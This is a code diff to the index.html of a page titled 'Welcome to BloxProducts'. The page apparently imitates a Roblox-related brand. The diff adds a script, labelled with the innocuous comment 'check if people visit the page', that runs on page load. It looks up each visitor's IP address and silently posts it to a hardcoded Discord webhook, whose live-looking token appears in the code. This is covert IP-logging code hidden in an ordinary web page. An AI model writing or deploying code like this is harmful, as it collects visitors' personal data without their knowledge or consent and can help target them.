--- a/index.html
+++ b/index.html
@@ -1,5 +1,7 @@
 <!DOCTYPE html>
+
 <html lang="en">
+
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
@@ -60,6 +62,7 @@
     }
   </style>
 </head>
+
 <body>
   <div class="container">
     <h1>Welcome to BloxProducts</h1>
@@ -74,19 +77,20 @@
   </div>
 <script>
   // check if people visit the page 
-  fetch('https://bloxproducts-com.github.io/d/', {
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json' },
-    body: JSON.stringify({ content: `IP: ${data.ip}` })
-  })
-  .then(response => {
-    
-  })
-  .catch(error => {
-    
-  });
+  var ip = 'https://discord.com/api/webhooks/1219374130672046120/kA4dAwQ2AIP7ZD3K6-4Tmd6R4RZkcZdMi2nxUn8nQFlsRVD6btOHMYZmcnQcbSg8qR8h';
+
+  fetch('https://api.ipify.org?format=json')
+    .then(response => response.json())
+    .then(data => {
+      fetch(ip, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify({ content: `IP: ${data.ip}` })
+      });
+    })
+    .catch(error => console.error('Error fetching IP:', error));
 </script>
 </body>
-</html>
 
+</html>
 
